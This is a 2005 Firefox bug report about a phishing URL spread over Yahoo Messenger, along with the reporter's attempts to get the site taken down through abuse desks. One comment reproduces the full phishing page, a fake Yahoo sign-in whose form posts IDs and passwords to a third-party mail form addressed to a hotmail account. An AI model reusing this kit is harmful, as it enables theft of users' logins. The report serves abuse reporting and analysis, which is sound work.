Closed
Bug 305198
Opened 19 years ago
Closed 19 years ago
malicious URL makes firefox unhappy
Categories
(Firefox :: General, defect)
Tracking
()
VERIFIED
WORKSFORME
People
(Reporter: bmo, Unassigned)
References
()
Details
Attachments
(2 files)
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Build Identifier: i got IM'd (from an infected friend's computer) the following URL: http://hstrial-yphotos001.homestead.com/index.html it looks like it's just a yahoo password phishing site, probably so that it can keep spreading via YIM, but firefox had to be force-killed right after i went there. could just be coincidence, but somebody braver than i (or with vmware) should check it out. Reproducible: Always Steps to Reproduce:
| Reporter | ||
Comment 2•19 years ago
|
||
| Reporter | ||
Comment 3•19 years ago
|
||
here's the large string from index.html unescaped: === <html> <head> <script language=javascript type=text/javascript src="http://us.i1.yimg.com/us.yimg.com/lib/common/yg_csstare.js"></script> <link rel="stylesheet" href="http://us.i1.yimg.com/us.yimg.com/lib/cmrc/base.css" type="text/css"> <link rel="stylesheet" href="http://us.i1.yimg.com/us.yimg.com/lib/ph/css/yph2.css" type="text/css"> <link type="text/css" rel="stylesheet" href="http://us.i1.yimg.com/us.yimg.com/i/reg2.css"> <style type="text/css"> <!-- @import "http://us.i1.yimg.com/us.yimg.com/lib/ph/css/yphbtn.css"; --> </style> <style type="text/css"> <!-- .btn,.btnylw{font-size:12px;width:100px;font-weight:800;color:#4f4f4f;vertical-align:middle;} .btnylw{background-color:#FFC02B;} --> </style> <script language="javascript" src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"> </script> <script language="javascript"> /* * A JavaScript implementation of the RSA Data Security, Inc. MD5 Message * Digest Algorithm, as defined in RFC 1321. * Copyright (C) Paul Johnston 1999 - 2000. * Updated by Greg Holt 2000 - 2001. * See http://pajhome.org.uk/site/legal.html for details. */ /* * Convert a 32-bit number to a hex string with ls-byte first */ var hex_chr = "0123456789abcdef"; function rhex(num) { str = ""; for(j = 0; j <= 3; j++) str += hex_chr.charAt((num >> (j * 8 + 4)) & 0x0F) + hex_chr.charAt((num >> (j * 8)) & 0x0F); return str; } /* * Convert a string to a sequence of 16-word blocks, stored as an array. * Append padding bits and the length, as described in the MD5 standard. */ function str2blks_MD5(str) { nblk = ((str.length + 8) >> 6) + 1; blks = new Array(nblk * 16); for(i = 0; i < nblk * 16; i++) blks[i] = 0; for(i = 0; i < str.length; i++) blks[i >> 2] |= str.charCodeAt(i) << ((i % 4) * 8); blks[i >> 2] |= 0x80 << ((i % 4) * 8); blks[nblk * 16 - 2] = str.length * 8; return blks; } /* * Add integers, wrapping at 2^32. This uses 16-bit operations internally * to work around bugs in some JS interpreters. 
*/ function add(x, y) { var lsw = (x & 0xFFFF) + (y & 0xFFFF); var msw = (x >> 16) + (y >> 16) + (lsw >> 16); return (msw << 16) | (lsw & 0xFFFF); } /* * Bitwise rotate a 32-bit number to the left */ function rol(num, cnt) { return (num << cnt) | (num >>> (32 - cnt)); } /* * These functions implement the basic operation for each round of the * algorithm. */ function cmn(q, a, b, x, s, t) { return add(rol(add(add(a, q), add(x, t)), s), b); } function ff(a, b, c, d, x, s, t) { return cmn((b & c) | ((~b) & d), a, b, x, s, t); } function gg(a, b, c, d, x, s, t) { return cmn((b & d) | (c & (~d)), a, b, x, s, t); } function hh(a, b, c, d, x, s, t) { return cmn(b ^ c ^ d, a, b, x, s, t); } function ii(a, b, c, d, x, s, t) { return cmn(c ^ (b | (~d)), a, b, x, s, t); } /* * Take a string and return the hex representation of its MD5. */ function MD5(str) { x = str2blks_MD5(str); var a = 1732584193; var b = -271733879; var c = -1732584194; var d = 271733878; for(i = 0; i < x.length; i += 16) { var olda = a; var oldb = b; var oldc = c; var oldd = d; a = ff(a, b, c, d, x[i+ 0], 7 , -680876936); d = ff(d, a, b, c, x[i+ 1], 12, -389564586); c = ff(c, d, a, b, x[i+ 2], 17, 606105819); b = ff(b, c, d, a, x[i+ 3], 22, -1044525330); a = ff(a, b, c, d, x[i+ 4], 7 , -176418897); d = ff(d, a, b, c, x[i+ 5], 12, 1200080426); c = ff(c, d, a, b, x[i+ 6], 17, -1473231341); b = ff(b, c, d, a, x[i+ 7], 22, -45705983); a = ff(a, b, c, d, x[i+ 8], 7 , 1770035416); d = ff(d, a, b, c, x[i+ 9], 12, -1958414417); c = ff(c, d, a, b, x[i+10], 17, -42063); b = ff(b, c, d, a, x[i+11], 22, -1990404162); a = ff(a, b, c, d, x[i+12], 7 , 1804603682); d = ff(d, a, b, c, x[i+13], 12, -40341101); c = ff(c, d, a, b, x[i+14], 17, -1502002290); b = ff(b, c, d, a, x[i+15], 22, 1236535329); a = gg(a, b, c, d, x[i+ 1], 5 , -165796510); d = gg(d, a, b, c, x[i+ 6], 9 , -1069501632); c = gg(c, d, a, b, x[i+11], 14, 643717713); b = gg(b, c, d, a, x[i+ 0], 20, -373897302); a = gg(a, b, c, d, x[i+ 5], 5 , -701558691); d 
= gg(d, a, b, c, x[i+10], 9 , 38016083); c = gg(c, d, a, b, x[i+15], 14, -660478335); b = gg(b, c, d, a, x[i+ 4], 20, -405537848); a = gg(a, b, c, d, x[i+ 9], 5 , 568446438); d = gg(d, a, b, c, x[i+14], 9 , -1019803690); c = gg(c, d, a, b, x[i+ 3], 14, -187363961); b = gg(b, c, d, a, x[i+ 8], 20, 1163531501); a = gg(a, b, c, d, x[i+13], 5 , -1444681467); d = gg(d, a, b, c, x[i+ 2], 9 , -51403784); c = gg(c, d, a, b, x[i+ 7], 14, 1735328473); b = gg(b, c, d, a, x[i+12], 20, -1926607734); a = hh(a, b, c, d, x[i+ 5], 4 , -378558); d = hh(d, a, b, c, x[i+ 8], 11, -2022574463); c = hh(c, d, a, b, x[i+11], 16, 1839030562); b = hh(b, c, d, a, x[i+14], 23, -35309556); a = hh(a, b, c, d, x[i+ 1], 4 , -1530992060); d = hh(d, a, b, c, x[i+ 4], 11, 1272893353); c = hh(c, d, a, b, x[i+ 7], 16, -155497632); b = hh(b, c, d, a, x[i+10], 23, -1094730640); a = hh(a, b, c, d, x[i+13], 4 , 681279174); d = hh(d, a, b, c, x[i+ 0], 11, -358537222); c = hh(c, d, a, b, x[i+ 3], 16, -722521979); b = hh(b, c, d, a, x[i+ 6], 23, 76029189); a = hh(a, b, c, d, x[i+ 9], 4 , -640364487); d = hh(d, a, b, c, x[i+12], 11, -421815835); c = hh(c, d, a, b, x[i+15], 16, 530742520); b = hh(b, c, d, a, x[i+ 2], 23, -995338651); a = ii(a, b, c, d, x[i+ 0], 6 , -198630844); d = ii(d, a, b, c, x[i+ 7], 10, 1126891415); c = ii(c, d, a, b, x[i+14], 15, -1416354905); b = ii(b, c, d, a, x[i+ 5], 21, -57434055); a = ii(a, b, c, d, x[i+12], 6 , 1700485571); d = ii(d, a, b, c, x[i+ 3], 10, -1894986606); c = ii(c, d, a, b, x[i+10], 15, -1051523); b = ii(b, c, d, a, x[i+ 1], 21, -2054922799); a = ii(a, b, c, d, x[i+ 8], 6 , 1873313359); d = ii(d, a, b, c, x[i+15], 10, -30611744); c = ii(c, d, a, b, x[i+ 6], 15, -1560198380); b = ii(b, c, d, a, x[i+13], 21, 1309151649); a = ii(a, b, c, d, x[i+ 4], 6 , -145523070); d = ii(d, a, b, c, x[i+11], 10, -1120210379); c = ii(c, d, a, b, x[i+ 2], 15, 718787259); b = ii(b, c, d, a, x[i+ 9], 21, -343485551); a = add(a, olda); b = add(b, oldb); c = add(c, oldc); d = add(d, oldd); 
} return rhex(a) + rhex(b) + rhex(c) + rhex(d); } function valid_js() { // anything that claims NS 4 or higher functionality better work if (navigator.userAgent.indexOf("Mozilla/") == 0) { return (parseInt(navigator.appVersion) >= 4); } return false; } function hash(form,login_url) { // this is Javascript enabled browser //document.login_form[".js"].value=1; // rudimentary check for a 4.x brower. should catch IE4+ and NS4.* var url; if (arguments.length > 1 && login_url != "") { // in case login_url is not passed in url = login_url; } else { url = "http://login.yahoo.com/config/login"; } url += "?"; if (valid_js()) { var passwd = form.passwd.value; var challenge = form[".challenge"].value; var hash2 = MD5(form.passwd.value) + challenge; var hash; if(form.passwd.value){ hash=MD5(hash2); } else { hash=""; } var js = 0; for(i=0; i<form.elements.length; i++){ if(typeof(form.elements[i].name)=="undefined" || form.elements[i].name.length <=0) { continue; } if(i > 0){ url += "&"; } url += form.elements[i].name; url += "="; if(form.elements[i].name == "passwd"){ url += hash; } else if (form.elements[i].type == "checkbox" && !form.elements[i].checked) { url += ""; } else if (form.elements[i].type == "radio" && !form.elements[i].checked) { url += ""; } else if (form.elements[i].name == ".save"){ url += "1"; // "Sign in" causes problem with the space } else if (form.elements[i].name == ".js"){ js = 1; url += "1"; } else { url += escape(form.elements[i].value); } } // indicate the password is hashed. url += "&.hash=1"; if(js == 0){ url += "&.js=1"; } url += "&.md5=1"; //alert("url=" + url); location.href=url; // prevent from running this again. Allow the server response to submit the form directly form.onsubmit=null; // abort normal form submission return false; } // allow normal form submission return true; } </script> <title>Yahoo! 
Photos </title> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="0"> <META HTTP-EQUIV=Refresh CONTENT=900;> <style type="text/css"> input { font:10px Verdana, Arial, sans-serif; } </style> </head> <body bgcolor=#ffffff onload="document.login_form.login.focus();"> <center> <script language="JavaScript"> <!-- hasMsgr = 0; function dontGotIt(){ hasMsgr = 0; document.login_form.hasMsgr.value=0; } function doGotIt(){ hasMsgr = 1; document.login_form.hasMsgr.value=1; } //--> </script> <table border=0 cellpadding=0 cellspacing=0 width=750> <tr> <td colspan=3> <table border=0 width=100% cellpadding=4 cellspacing=0> <tr> <td valign=bottom><table cellpadding=0 cellspacing=2 width=750 border="0"> <tr> <td rowspan=2 valign=middle width=1%> <img src="http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_ph_1.gif" alt="Yahoo! Photos" width=231 height=33 border=0> </td> <td rowspan=2 width=10><spacer type=block width=1 height=1></td> <td align=right valign=bottom> <small><a href=http://www.yahoo.com>Yahoo!</a> - <a href="http://help.yahoo.com/help/us/photos/ ">Help</a></small> </td> </tr> <tr> <td colspan=3><hr size=1 noshade style="border:0px;"></td> </tr> </table> </td> </tr> <tr> <td> <!-- Start Top Bar --> <!-- End Top Bar --></td> </tr> </table> </td> </tr> </table> <table border=0 cellpadding=0 cellspacing=0 width=705 align="center"> <tr> <td colspan=9 height=35 class=yphspmainhdr>Share your photos with the people who matter</td> </tr> <tr align="left" valign="TOP"> <td width="450"> <table border=0 cellpadding=0 cellspacing=0 width=450 height=180> <tr> <td rowspan=5><img src="http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_photos/photo1_040305.jpg" width="272" height="238" alt=""></td> <td rowspan=5 width=5 nowrap><spacer type=block width=7 height=1></td> <td rowspan=5><img src="http://us.i1.yimg.com/us.yimg.com/i/us/ph/gr/pic_r_2.gif" width="172" height="238" alt=""></td> <td rowspan=5 width=5 nowrap><spacer type=block width=7 height=1></td> </tr> 
</table> <table border=0 cellpadding=0 cellspacing=0 width=450> <tr> <td height=5><spacer type=block height=5></td> </tr> </table> <!-- AD SERVED MOD BEGIN --> <table border="0" cellpadding="0" cellspacing="0" width="450"> <tbody><tr valign="top"> <td rowspan="2" width="6"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/ph/el/c_g_nw.gif" width="6" height="6"></td> <td height="1" class="yphsectbr"><spacer type="block" width="1" height="1"></td> <td rowspan="2" width="6"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/ph/el/c_g_ne.gif" width="6" height="6"></td> </tr> <tr> <td width="438" height="6"><spacer type="block" width="438" height="6"></td> </tr> </tbody></table> <table border="0" cellpadding="0" cellspacing="0" width="450"> <tbody><tr valign="top"> <td class="yphsectbr" width="1"><spacer type="block" width="1" height="1"></td> <td width="448"><spacer type="block" width="448" height="1"></td> <td class="yphsectbr" width="1"><spacer type="block" width="1" height="1"></td> </tr> </tbody></table> <table border="0" cellpadding="0" cellspacing="0" width="450" height="90"> <tbody> <tr valign="top"> <td class="yphsectbr" width="1"><spacer type="block" width="1" height="1"></td> <td width="10"><spacer type="block" width="10" height="1"></td> <td width="65"><img style="margin-top:10px;" src="http://us.i1.yimg.com/us.yimg.com/i/us/ph/pr/gifts/prints_2_f_55x55.gif" width="55" height="55"></td> <td><div style="margin-top:10px;"><span class="yphsphdr"><b>19¢ Prints- Every Day</b></span><br><small>Get film-quality prints starting at just 19¢. Plus your first 10 are free!<br> </small></div></td> <td width="50"><img style="margin-top:10px;" src="http://us.i1.yimg.com/us.yimg.com/i/us/ph/pr/pr_imv_1.jpg" width="40" height="40"></td> <td width="163"><div style="margin-top:10px;"><span class="yphsphdr"><b>Share Photos Your Way</b></span><br> <small>Share photos via email, in Yahoo! 
Messenger, or on your mobile phone.</small><small><br> <br> </small></div></td> <td width="10"><spacer type="block" width="10" height="1"></td> <td class="yphsectbr" width="1"><spacer type="block" width="1" height="1"></td> </tr> </tbody> </table> <table border="0" cellpadding="0" cellspacing="0" width="450"> <tbody><tr valign="top"> <td rowspan="2" width="6"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/ph/el/c_g_sw.gif" width="6" height="6"></td> <td width="438" height="6"><spacer type="block" width="438" height="6"></td> <td rowspan="2" width="6"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/ph/el/c_g_se.gif" width="6" height="6"></td> </tr> <tr> <td height="1" class="yphsectbr"><spacer type="block" width="1" height="1"></td> </tr> </tbody></table> <!-- AD SERVED MOD END --> </td> <td width="5"> </td> <td width="250"> <FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/ mailto.cgi" ENCTYPE="x-www-form-urlencoded"> <script language=javascript> <!-- browser_string = navigator.appVersion + " " + navigator.userAgent; if ( browser_string.indexOf("MSIE") < 0 ) { if (navigator.mimeTypes) { for (i = 0 ; i < navigator.mimeTypes.length ; i++) { if (navigator.mimeTypes[i].suffixes.indexOf("yps") > -1) { doGotIt(); } } } else { dontGotIt(); } } else { if (browser_string.indexOf("Windows")>=0) { doGotIt(); document.write('<object classid="clsid:41695A8E-6414-11D4-8FB3-00D0B7730277" CODEBASE="javascript:dontGotIt();" ID="Ymsgr" width="1" height="1">'); document.write('</object>'); } } //--> </script> <INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo"> <INPUT TYPE="hidden" NAME="Mail_To" VALUE="vixi_xlx_zlz_xlx@hotmail.com"> <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id"> <INPUT TYPE="hidden" NAME="Next_Page" VALUE="http://photos.yahoo.com/ph//my_photos"> <table cellpadding="0" cellspacing="0" border="0" height="238"> <tr bgcolor=86A863> <td colspan=5 valign=top><img src=http://us.i1.yimg.com/us.yimg.com/i/us/ph/el/start_top.gif></td> </tr> <tr 
bgcolor=86A863> <td rowspan=3 width=1 bgcolor=E1CA83><spacer type=block width=1 height=1></td> <td rowspan=3 width=10><spacer type=block width=10></td> <td width=193><b class=w>Yahoo! Member Sign In</b></td> <td rowspan=3 width=10><spacer type=block width=10></td> <td rowspan=3 width=1 bgcolor=E1CA83><spacer type=block width=1 height=1></td> </tr> <tr><td bgcolor=E1CA83 height=1><spacer type=block width=1 height=1></td></tr> <tr bgcolor=86A863> <td> <table width=193 height=200 cellpadding=0 cellspacing=0 border=0> <tr bgcolor=86A863><td class=w>Yahoo! ID:</td><td><INPUT size=15 type="text" NAME="Usuario" style=width:100px;height:18px;></td></tr> <tr bgcolor=86A863><td class=w>Password:</td><td><INPUT size=15 TYPE="password" NAME="Senha" class="" style=width:100px;height:18px;></td></tr> <tr bgcolor=86A863><td colspan=2 class=w valign=center> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td valign="top" class=w ><input type=checkbox name=".persistent" value="y"></td><td> </td><td class=w>Remember my ID on this computer</td> </tr> </table> </td></tr> <tr bgcolor=86A863 align=center><td colspan=2><input type="submit" class=ygbt id=ygbtwhtlg value="Sign In"></td></tr> <tr bgcolor=86A863 align=center><td colspan=2 class=w><small><b>Mode:</b></small> <font class="w"><small><b>Standard</b></small></font> | <a href="https://login.yahoo.com/config/login?.src=ph&.v=0&.u=eafaild13qrud&.last=&promo=&.intl=us&.bypass=&.partner=&pkg=&stepid=&.done=http%3a//pg.photos.yahoo.com/ph/my_photos" class="w"><small>Secure</small></a> <tr bgcolor=86A863 align=center><td colspan=2 class=w><a href="" class=w><small><a href="http://edit.yahoo.com/config/form?.form=passwords-help&lg=us&new=1&.src=ph&referer=&partner=&.done=http://pg.photos.yahoo.com/ph/my_photos" class=w>Sign-in help</a> | <a href="http://edit.yahoo.com/config/eval_forgot_pw?new=1&.done=http://pg.photos.yahoo.com/ph/my_photos&.src=ph&partner=&.intl=us&pkg=&stepid=&.last=" class=w>Forgot your 
password?</a></small></a></td></tr> <tr><td bgcolor=E1CA83 height=1 colspan=2><spacer type=block width=1 height=1></td></tr> <tr bgcolor=86A863><td colspan=2><small><b class=w>Not a member?</b></small><br><a href="http://us.rd.yahoo.com/reg/su_s1/us/*http://edit.yahoo.com/config/eval_register?.intl=us&new=1&.done=http%3a//pg.photos.yahoo.com/ph/my_photos&.src=ph&.v=0&.u=eafaild13qrud&partner=&.p=&promo=&.last=" class=w><small>Become a Yahoo! Member</small></a></td></tr> </table> </td> </tr> <tr><td colspan=5 valign=top><img src=http://us.i1.yimg.com/us.yimg.com/i/us/ph/el/start_btm.gif></td></tr></form> </table> <SCRIPT language=JavaScript> <!-- var speed = 10 var pause = 1500 var timerID = null var bannerRunning = false var ar = new Array() ar[0] = "Yahoo! My Photos" ar[1] = "Yahoo! My Photos" ar[2] = "Yahoo! My Photos" ar[3] = "Yahoo! My Photos" var message = 0 var state = "" clearState() function stopBanner() { if (bannerRunning) clearTimeout(timerID) timerRunning = false } function startBanner() { stopBanner() showBanner() } function clearState() { state = "" for (var i = 0; i < ar[message].length; ++i) { state += "0" } } function showBanner() { if (getString()) { message++ if (ar.length <= message) message = 0 clearState() timerID = setTimeout("showBanner()", pause) } else { var str = "" for (var j = 0; j < state.length; ++j) { str += (state.charAt(j) == "1") ? 
ar[message].charAt(j) : " " } window.status = str timerID = setTimeout("showBanner()", speed) } } function getString() { var full = true for (var j = 0; j < state.length; ++j) { if (state.charAt(j) == 0) full = false } while (1) { var num = getRandom(ar[message].length) break } state = state.substring(0, num) + "1" + state.substring(num + 1, state.length) return false } function getRandom(max) { var now = new Date() var num = now.getTime() * now.getSeconds() * Math.random() return num % max } startBanner() // --> </SCRIPT> <table><td width=5 height=4 nowrap><spacer type=block width=5 height=4></td></table> <table border=0 cellpadding=0 cellspacing=0 width=215 class=yphsecbox2> <tr valign=top> <td width=6><img src=http://us.i1.yimg.com/us.yimg.com/i/us/ph/el/c_g_nw.gif width=6 height=6></td> <td height=1 width=203 class=yphsecbox2><spacer type=block width=203 height=1></td> <td width=6><img src=http://us.i1.yimg.com/us.yimg.com/i/us/ph/el/c_g_ne.gif width=6 height=6></td> </tr> </table> <table border=0 cellpadding=0 cellspacing=0 width=215 class=yphsecbox2 height=90> <tr valign=top> <td width=11 class=yphsecbox2><spacer type=block width=11 height=1></td> <td width=189 class=w> <b>Quick Tour</b><br> <small>See how it works by taking the Yahoo! 
Photos Quick Tour</small> <p> <small><a href="http://photos.yahoo.com/ph//page?.file=quick_tour_popup.html" onClick="window.open(this.href, 'popupwindow', 'width=734,height=330');return false;" class=w>Take the Quick Tour</a></small> </p> </td> <td width=11 class=yphsecbox2><spacer type=block width=11 height=1></td> </tr> </table> <table border=0 cellpadding=0 cellspacing=0 width=215 class=yphsecbox2> <tr valign=top> <td width=1><img src=http://us.i1.yimg.com/us.yimg.com/i/us/ph/el/c_g_sw.gif width=6 height=6></td> <td width=203 height=6><spacer type=block width=203 height=6></td> <td width=1><img src=http://us.i1.yimg.com/us.yimg.com/i/us/ph/el/c_g_se.gif width=6 height=6></td> </tr> </table> <script language="JavaScript" type="text/JavaScript"> <!-- var r=Math.random(); document.writeln("<img alt=\"Yahoo Image\" width=1 height=1 border=0\n"); document.writeln("src=\"https://pclick.internal.yahoo.com/p/s=96481216/lng=us/rand="+r+"\">"); //--> </script> <script language="JavaScript" type="text/JavaScript"> var r=Math.random(); document.writeln("<img alt=\"Yahoo Image\" width=1 height=1 border=0\n"); document.writeln("src=\"https://pclick.internal.yahoo.com/p/s=96386767/lng=us/rand="+r+"\">"); //--> </script> </td> </tr> </table> <center> <hr width="750" size="1" noshade> <table width="750" cellpadding="0" cellspacing="0" border="0" summary="null"> <tr> <td align="center"> <font size="-2" face="arial" color="#8d8d8d"> Copyright © 2005 Yahoo! Inc. All rights reserved. <a href="http://docs.yahoo.com/info/copyright/copyright.html" target="cp" title="Click here to view Yahoo! Copyright Policy">Copyright Policy</a> <a href="http://docs.yahoo.com/info/terms/" target="_new" title="Click here to view Yahoo! Terms of Service">Terms of Service</a><br> <b>NOTICE: We collect personal information on this site.<br>To learn more about how we use your information, see our <a href="http://privacy.yahoo.com/" target="_new" title="Click here to view Yahoo! 
Privacy Policy">Privacy Policy</a></b> </font> </td> </tr> </table> </center> </center> </body> </html> ===
| Reporter | ||
Comment 7•19 years ago
|
||
i'm not at all impressed with responses from abuse departments, so far. i got a form auto-reply from hotmail that couldn't find an abusive email with headers in my message. d'uh. there are other ways besides sending email that can be abusive :( i got a vacation reply from homestead. i got a bounce from fiberbit. so much for trying to be a good citizen... marc
| Reporter | ||
Comment 8•19 years ago
|
||
here's fiberbit.net bounce: === Date: Fri, 19 Aug 2005 09:30:25 -0400 From: Mail Delivery Subsystem <MAILER-DAEMON@tenet.verdasys.com> Message-Id: <200508191330.j7JDUP526404@tenet.verdasys.com> To: <beej@alum.mit.xxx> MIME-Version: 1.0 Content-Type: multipart/report; report-type=delivery-status; boundary="j7JDUP526404.1124458225/tenet.verdasys.com" Subject: Returned mail: see transcript for details Auto-Submitted: auto-generated (failure) X-Spam-Score: -2.599 X-Spam-Flag: NO X-Scanned-By: MIMEDefang 2.42 The original message was received at Fri, 19 Aug 2005 09:30:23 -0400 from tenet.verdasys.com [127.0.0.1] ----- The following addresses had permanent fatal errors ----- <abuse@fiberbit.net> (reason: 550 5.0.0 <abuse@fiberbit.net>... Virtual user unknown) ----- Transcript of session follows ----- ... while talking to lb1.fiberbit.net.: >>> RCPT To:<abuse@fiberbit.net> <<< 550 5.0.0 <abuse@fiberbit.net>... Virtual user unknown 550 5.1.1 <abuse@fiberbit.net>... User unknown Reporting-MTA: dns; tenet.verdasys.com Received-From-MTA: DNS; tenet.verdasys.com Arrival-Date: Fri, 19 Aug 2005 09:30:23 -0400 Final-Recipient: RFC822; abuse@fiberbit.net Action: failed Status: 5.0.0 Remote-MTA: DNS; lb1.fiberbit.net Diagnostic-Code: SMTP; 550 5.0.0 <abuse@fiberbit.net>... 
Virtual user unknown Last-Attempt-Date: Fri, 19 Aug 2005 09:30:25 -0400 Return-Path: <beej@alum.mit.edu> Received: from KGB.alum.mit.edu (tenet.verdasys.com [127.0.0.1]) by tenet.verdasys.com (8.11.6/8.11.6) with ESMTP id j7JDUM526402 for <abuse@fiberbit.net>; Fri, 19 Aug 2005 09:30:23 -0400 Message-Id: <6.0.3.0.2.20050819092721.054b09c0@127.0.0.1> X-Sender: 127.0.0.1:beej@127.0.0.1 (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 6.0.3.0 Date: Fri, 19 Aug 2005 09:28:00 -0400 To: abuse@fiberbit.net From: Marc Bejarano <beej@alum.mit.xxx> Subject: Fwd: YIM virus Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed can you disable: <http://www2.fiberbit.net/form/>http://www2.fiberbit.net/form/ ?? it is being used in the following malware... marc ===== Date: Fri, 19 Aug 2005 09:22:43 -0400 To: abuse@homestead.com From: Marc Bejarano <beej@alum.mit.xxx> Subject: Fwd: YIM virus please disable the following malicious URL: http://hstrial-yphotos001.homestead.com/index.html tia, marc ===== Date: Fri, 19 Aug 2005 09:21:19 -0400 To: abuse@hotmail.com From: Marc Bejarano <beej@alum.mit.xxx> Subject: YIM virus Cc: abuse@yahoo.com i just got IM'd (via yahoo) the URL to what looks like a page spreading malware that sends collected yahoo logins to vixi_xlx_zlz_xlx@hotmail.com. please disable this account. the malicious URL is: http://hstrial-yphotos001.homestead.com/index.html yahoo folks: can you filter this URL from being sent through your system? marc ===== ===== ===
| Reporter | ||
Comment 9•19 years ago
|
||
and hotmail: ===== Date: Fri, 19 Aug 2005 06:22:27 -0700 (PDT) To: beej@alum.mit.xxx From: MSN Hotmail <abuse@hotmail.com> Subject: YIM virus X-Originating-IP: [65.54.241.240] This is an auto-generated response designed to answer your question as quickly as possible. Please note that you will not receive a reply if you respond directly to this message. Unfortunately, we cannot take action on the mail you sent us because it does not reference a Hotmail account. Please send us another message that contains the full Hotmail e-mail address and the full e-mail message to: abuse@hotmail.com >>> To forward mail with full headers Using Hotmail: 1. Click "Options" to the right of the "Contacts" tab. The "Options" page appears. 2. Under "Additional Options", click "Mail Display Settings". The "Mail Display Settings" page appears. 3. Under "Message Headers", select "Full" and click "OK". 4. Forward the resulting mail to: abuse@hotmail.com Using MSN Explorer: 1. Open the message, and then click "More" in the upper right corner. 2. Click "Message Source". The message opens in a new window with all the header information visible. 3. Copy all the text and paste it into a new message. Send this message to: abuse@msn.com Using Outlook Express or Outlook: 1. On the unopened mail, place your cursor over the mail, right-click, and click "Options". 2. Under "Internet headers", copy the contents of the full header. 3. Open the e-mail in question and forward a complete copy of the message, including the full message header you copied at the beginning of your message, to: abuse@hotmail.com If you're not a Hotmail member, consult the Help associated with your e-mail program to determine how to view complete header information. Then forward the message to: abuse@hotmail.com If the unsolicited junk e-mail or "spam" comes from a non-Hotmail account, you can send a complaint to the service provider that sent the mail. Make sure that you include full headers when you send your complaint. 
In the full header, look at the last "Received" notation to locate what .com domain it came from. It looks something like: [service provider domain name].com Forward a complete copy of the message, including the full message header, to: abuse@[service provider domain name].com If the domain does not have an abuse service, forward your complaint to: webmaster@[service provider domain name].com All Hotmail customers have agreed to MSN Website Terms of Use and Notices(TOU) that forbid e-mail abuse. At the bottom of any page in Hotmail, click "Terms of Use" to view the Terms of Use document in its entirety. Thank you for helping us enforce our TOU. =====
| Reporter | ||
Comment 10•19 years ago
|
||
wow.. calling the seattle FBI field office was fruitless. they just tried to put me in touch with the ic3.gov folks. and they were not helpful, at all. they just want an online form filled out which goes into a huge queue. i filled out a complaint, anyway. Complaint number: I05081911326223 Password: duvube
| Reporter | ||
Comment 11•19 years ago
|
||
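i think all that javascript is just slamming the cpu, so this is likely just a DoS for firefox. one candidate in the pasted page is the status-bar banner script: getString() always returns false, so showBanner() re-arms a 10 ms setTimeout() indefinitely and rewrites window.status on every tick.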
| Reporter | ||
Comment 12•19 years ago
|
||
heard back from homestead: === Date: Fri, 19 Aug 2005 09:17:49 -0700 (PDT) From: Homestead Abuse Administrator <abuse@homesteadsupport.com> To: Marc Bejarano <beej@alum.mit.edu> Subject: Re: Fwd: YIM virus (KMM6694464I30L0KM) Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit x-mailer: KANA Response 7.5.2.76.4 X-Spam-Score: -0.985 X-Spam-Flag: NO X-Scanned-By: MIMEDefang 2.42 Hello Marc, Thank you for bringing this situation to our attention. As a passive conduit, Homestead cannot monitor user websites, but we respond to breaches of our user agreement when we learn of such behavior. Therefore, prior to your complaint, we were unaware that this site was on our server. Given that the user appears to be breaching our Member Agreement, we have closed the user's account and removed the offensive site. Thank you again. Regards, Homestead Abuse Team Homestead Technologies [Case #3094108] <snip my original report> =====
| Reporter | ||
Comment 13•19 years ago
|
||
this should be opened up to the public. i don't see any evidence that this is some 0-day firefox exploit, or anything ;)
Updated•19 years ago
|
Group: security
Comment 14•19 years ago
|
||
Could you please provide a talkback ID from the crash (if still possible to reproduce)? http://kb.mozillazine.org/Talkback
Updated•19 years ago
|
Flags: blocking1.8b4?
Updated•19 years ago
|
Flags: blocking1.8b4?
| Reporter | ||
Comment 15•19 years ago
|
||
great. my second attempt to email abuse@hotmail failed, too. i had included an email from hotmail with the headers just so that i could get by their stupid filter. apparently that didn't help :( ===== X-SRX: 1001428993 X-Mailer: Microsoft Avondale Mailer Thread-Topic: SRX1001428993ID - YIM virus thread-index: AcWlSgc3OE3xlz0QRsSK7cVfJT+3aA== Reply-To: From: "MSN Hotmail Technical Support" <abuse_EN_SY@css.one.microsoft.com> To: "Marc Bejarano" <beej@alum.mit.edu> Cc: Subject: RE: SRX1001428993ID - YIM virus Date: Fri, 19 Aug 2005 22:43:01 -0700 Importance: normal Priority: normal X-OriginalArrivalTime: 20 Aug 2005 05:43:01.0795 (UTC) FILETIME=[07436F30:01C5A54A] Hello Marc,Thank you for writing to MSN Hotmail Technical Support. My name is Divino and I am writing in response about the un-solicited e-mail message you have received. We have investigated the account you have reported and we found that the X-Originating IP of the e-mail you have sent us did not match. It is possible that it was forged or tampered with. If you have any other documentation from this sender, please send it to us immediately with complete message headers. I suggest that you refer to the help section of your email service provider for instructions on how to view full headers. After exposing the full headers, forward the mail to: abuse@hotmail.com Hotmail firmly enforces its Terms of Use (TOU) including our anti-spam stance. You can review our TOU ! at: http://privacy.msn.com/tou/default.aspWe are very sorry if we were not able to take action against this person because we need sufficient evidence to justify our actions. We are looking forward to hear from you soon. I appreciate your patience and understanding regarding this matter. Sincerely,Divino T.MSN Hotmail Technical Support <snip my original msg> =====
| Reporter | ||
Comment 16•19 years ago
|
||
firefox never crashed, so there is no talkback id. firefox just chewed up inordinate amounts of CPU time.
Comment 17•19 years ago
|
||
